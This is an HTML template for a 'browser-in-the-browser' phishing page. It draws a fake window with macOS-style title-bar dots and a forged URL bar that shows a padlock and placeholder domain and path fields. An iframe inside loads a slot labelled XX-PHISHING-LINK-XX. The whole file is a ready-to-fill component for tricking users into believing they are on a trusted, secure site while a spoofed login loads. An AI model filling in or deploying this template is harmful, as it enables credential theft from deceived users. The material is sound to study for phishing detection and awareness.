<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="stylesheet" href="style.css">
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
</head>
<body>
<div id="window">
<!-- Title bar start -->
<div id="title-bar-width">
	<div id="title-bar" class="outer yosemite">
		<span class="dots">
	     <div id="exit" class="dot red"></div>
	     <div id="minimize" class="dot amber"></div>
	     <div id="maximize" class="dot green"></div>
	    </span>

	     <span id="logo-description">XX-TITLE-XX</span>
	</div>
	<div id="url-bar">
		<img src="./ssl.svg" width="20px" height="20px" id="ssl-padlock">
		<span id="domain-name">XX-DOMAIN-NAME-XX</span>
		<span id="domain-path">XX-DOMAIN-PATH-XX</span>
	</div>
</div>
<!-- Content start -->
<iframe id="content" src="XX-PHISHING-LINK-XX" frameBorder="0"></iframe>
</div>
</body>
<script src="script.js"></script>
</html>

